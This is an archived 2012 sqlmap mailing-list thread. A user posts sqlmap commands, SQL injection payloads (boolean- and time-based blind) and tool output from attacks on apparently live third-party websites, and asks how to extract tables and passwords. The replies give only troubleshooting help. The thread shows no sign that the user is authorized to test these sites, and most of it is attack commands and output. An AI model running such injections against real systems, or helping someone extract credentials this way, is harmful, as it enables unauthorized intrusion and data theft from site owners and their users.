[sqlmap-users] 回复：： sqlmap can't retrieved data

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

<div>Hi Stampar,</div><div><br></div><div>&nbsp; &nbsp; THanks for your email , i fix the last problem with your direction .</div><div><br></div><div>but another problem is coming . i have find inject point ,but can't retrieve data . details as followed .&nbsp;</div><div><br></div><div><div>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.xxxx/F/01/product/Products.asp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&amp;JumpButton=Go&amp;JumpPage=22" --param-del="&amp;" --hex -a</div><div><br></div><div>&nbsp; &nbsp; sqlmap/1.0-dev-a40d7a5 - automatic SQL injection and database takeover tool</div><div>&nbsp; &nbsp; http://sqlmap.org</div><div><br></div><div>[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</div><div><br></div><div>[*] starting at 13:53:13</div><div><br></div><div>[13:53:13] [INFO] resuming back-end DBMS 'mysql'&nbsp;</div><div>[13:53:13] [INFO] testing connection to the target url</div><div>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:</div><div>---</div><div>Place: POST</div><div>Parameter: hidJumpId</div><div>&nbsp; &nbsp; Type: boolean-based blind</div><div>&nbsp; &nbsp; Title: AND boolean-based blind - WHERE or HAVING clause</div><div>&nbsp; &nbsp; Payload: hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&amp;JumpButton=Go&amp;JumpPage=22</div><div>---</div><div>[13:53:18] [INFO] the back-end DBMS is MySQL</div><div>[13:53:18] [INFO] fetching banner</div><div>[13:53:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval</div><div>[13:53:18] [INFO] retrieved:&nbsp;</div><div>[13:53:18] [INFO] heuristics detected web page charset 'ascii'</div><div>[13:53:18] [INFO] retrieved: &nbsp;&nbsp;</div><div>web server operating system: Windows 2000</div><div>web application technology: ASP, Microsoft IIS 5.0</div><div>back-end DBMS: MySQL 5</div><div>[13:53:18] [INFO] fetching banner</div><div>[13:53:19] [INFO] retrieved: &nbsp;&nbsp;</div><div>[13:53:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'</div><div>banner:<span class="Apple-tab-span" style="white-space:pre">	</span>None</div><div>[13:53:19] [INFO] fetching current user</div><div>[13:53:20] [INFO] retrieved: &nbsp;&nbsp;</div><div>current user:<span class="Apple-tab-span" style="white-space:pre">	</span>None</div><div>[13:53:20] [INFO] fetching current database</div><div>[13:53:21] [INFO] retrieved: &nbsp;&nbsp;</div><div>current database:<span class="Apple-tab-span" style="white-space:pre">	</span>None</div><div>[13:53:21] [INFO] fetching server hostname</div><div>[13:53:22] [INFO] retrieved: &nbsp;&nbsp;</div><div>hostname:<span class="Apple-tab-span" style="white-space:pre">	</span>None</div><div>[13:53:22] [INFO] testing if current user is DBA</div><div>[13:53:22] [INFO] fetching current user</div><div>[13:53:22] [INFO] retrieved: &nbsp;&nbsp;</div><div>current user is DBA: &nbsp; &nbsp;True</div><div>[13:53:23] [INFO] fetching database users</div><div>[13:53:23] [INFO] fetching number of database users</div><div>[13:53:24] [INFO] retrieved: &nbsp;&nbsp;</div><div>[13:53:24] [CRITICAL] unable to retrieve the number of database users</div></div><div><br></div><div>best regards&nbsp;</div><div><br></div><div>bob</div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px">------------------</div><div style="font-size:14px;font-family:Verdana;color:#000;"><font size="+0">
<div><br></div></font></div></div><div><includetail><div><br></div><div style="font-size: 12px;font-family: Arial Narrow;padding:2px 0 2px 0;">------------------&nbsp;原始邮件&nbsp;------------------</div><div style="font-size: 12px;background:#efefef;padding:8px;"><div><b>发件人:</b>&nbsp;"Miroslav Stampar"&lt;mir...@gm...&gt;;</div><div><b>发送时间:</b>&nbsp;2012年11月15日(星期四) 下午2:26</div><div><b>收件人:</b>&nbsp;"Bob"&lt;sto...@qq...&gt;; <wbr></div><div></div><div><b>主题:</b>&nbsp;Re: [sqlmap-users] 回复： sqlmap y/N can 't workable</div></div><div><br></div><p dir="ltr">Hi.</p>
<p dir="ltr">You are running sqlmap as a background console process. You can't expect from a such process to be able to properly accept console input you do. This is not an sqlmap issue but yours.</p>
<p dir="ltr">If you want to run more instances of sqlmap at the same time either open multiple terminals or use some kind of console multiplexer (e.g. screen).</p>
<p dir="ltr">Kind regards,<br>
Miroslav Stampar</p>
<div class="gmail_quote">On Nov 15, 2012 6:53 AM, "Bob" &lt;<a href="mailto:sto...@qq...">sto...@qq...</a>&gt; wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
<div>HI Iago,</div><div><br></div><div>&nbsp; &nbsp; &nbsp;The sqlmap error .details as followed :</div><div><br></div><div><div>[13:32:02] [INFO] testing connection to the target url</div><div>[13:32:06] [INFO] testing if the url is stable, wait a few seconds</div>
<div>[13:32:11] [INFO] url is stable</div><div>[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic</div><div>[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic</div><div>
[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic</div><div>[13:32:14] [WARNING] reflective value(s) found and filtering out</div><div>[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable</div>
<div>[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'</div><div>[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</div><div>[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div>
<div>[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable </div><div>[13:33:04] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause'</div>
<div>[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'</div><div>
[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'</div><div>[13:33:38] [INFO] testing 'MySQL &gt; 5.0.11 stacked queries'</div>
<div>[13:33:38] [INFO] testing 'PostgreSQL &gt; 8.1 stacked queries'</div><div>[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'</div><div>[13:33:39] [INFO] testing 'MySQL &gt; 5.0.11 AND time-based blind'</div>
<div>[13:33:40] [INFO] testing 'PostgreSQL &gt; 8.1 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'</div><div>[13:33:41] [INFO] testing 'Oracle AND time-based blind'</div>
<div>[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found</div>
<div>[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'</div>
<div>[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive</div><div>[13:34:12] [INFO] heuristics detected web page charset 'ascii'</div><div>POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</div>
<div>N: command not found</div><div><br></div><div>[4]+ &nbsp;Stopped &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ./sqlmap.py -u "<a href="http://XXXp" target="_blank">http://XXXp</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&amp;JumpButton=Go&amp;JumpPage=22" --param-del=</div>
<div><br></div><div>[4]+ &nbsp;Stopped &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ./sqlmap.py -u "<a href="http://XXX" target="_blank">http://XXX</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&amp;JumpButton=Go&amp;JumpPage=22" --param-del=</div>
</div><div><br></div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px"><br></div><div style="font-size:14px;font-family:Verdana"><font size="+0">
<div>&nbsp;</div></font></div></div><div>&nbsp;</div><div><u></u><div><br></div><div><br></div><div style="font-size:12px;font-family:Arial Narrow;padding:2px 0 2px 0">------------------ 原始邮件 ------------------</div><div style="font-size:12px;background:#efefef;padding:8px">
<div><b>发件人:</b>&nbsp;"Iago Sousa"&lt;<a href="mailto:146...@gm..." target="_blank">146...@gm...</a>&gt;;</div><div><b>发送时间:</b>&nbsp;2012年6月24日(星期天) 中午12:33</div><div><b>收件人:</b>&nbsp;"Bob"&lt;<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>&gt;; <u></u></div>
<div><b>抄送:</b>&nbsp;"sqlmap-users"&lt;<a href="mailto:sql...@li..." target="_blank">sql...@li...</a>&gt;; <u></u></div><div><b>主题:</b>&nbsp;Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget url</div>
</div><div><br></div><p>I think that the site is blocking your ip address.</p>
<p></p><blockquote type="cite">On Jun 23, 2012 11:09 PM, "Bob" &lt;<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>&gt; wrote:<br><br><div><br>Hi all,<br><br>&nbsp;&nbsp; I am use sqlmap to retrieve&nbsp; database <br>
<br>
 current-user and current-db can workable <br><br>retrieve tables ,passwords&nbsp; etc will response time out <br><br>Could you tell me what is the problem ? how i can retrieve tables and passwords ?<br><br>Thanks <br><br>bob<br>

[09:56:07] [INFO] testing connection to the target url<br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: c_sn<br>&nbsp; &nbsp; Type: boolean-based blind<br>&nbsp; &nbsp; Title: AND boolean-based blind - WHERE or HAVING clause<br>

&nbsp; &nbsp; Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm<br><br>&nbsp; &nbsp; Type: AND/OR time-based blind<br>&nbsp; &nbsp; Title: MySQL &gt; 5.0.11 AND time-based blind<br>&nbsp; &nbsp; Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl<br>

---<br><br>[09:56:08] [INFO] testing MySQL<br>[09:56:08] [INFO] confirming MySQL<br>[09:56:08] [INFO] the back-end DBMS is MySQL<br>web server operating system: Linux CentOS 5<br>web application technology: Apache 2.2.3, PHP 5.1.6<br>

back-end DBMS: MySQL &gt;= 5.0.0<br>[09:56:08] [INFO] fetching current user<br>[09:56:08] [INFO] resumed: keyway_db@localhost<br>current user:&nbsp; &nbsp; 'keyway_db@localhost'<br><br>[09:56:08] [INFO] fetching database users privileges<br>

[09:56:08] [INFO] fetching database users<br>[09:56:08] [INFO] fetching number of database users<br>[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br>

[09:56:08] [INFO] retrieved: <br>[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>

[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[10:00:12] [CRITICAL] connection timed out to the target url or proxy<br><br>[*] shutting down at 10:00:12<br>

<br><br></div><br>------------------------------------------------------------------------------<br>
Live Security Virtual Conference<br>
Exclusive live event will cover all the ways today's security and<br>
threat landscape has changed and how IT managers can respond. Discussions<br>
will include endpoint security, mobile security and the latest in malware<br>
threats. <a href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br>
sqlmap-users mailing list<br>
<a href="mailto:sql...@li..." target="_blank">sql...@li...</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br>
<br></blockquote><p></p><u></u></div><br>------------------------------------------------------------------------------<br>
Monitor your physical, virtual and cloud infrastructure from a single<br>
web console. Get in-depth insight into apps, servers, databases, vmware,<br>
SAP, cloud infrastructure, etc. Download 30-day Free Trial.<br>
Pricing starts from $795 for 25 servers or applications!<br>
<a href="http://p.sf.net/sfu/zoho_dev2dev_nov" target="_blank">http://p.sf.net/sfu/zoho_dev2dev_nov</a><br>_______________________________________________<br>
sqlmap-users mailing list<br>
<a href="mailto:sql...@li...">sql...@li...</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br>
<br></blockquote></div></includetail></div>

[sqlmap-users] 回复： ： sqlmap can't retrieved data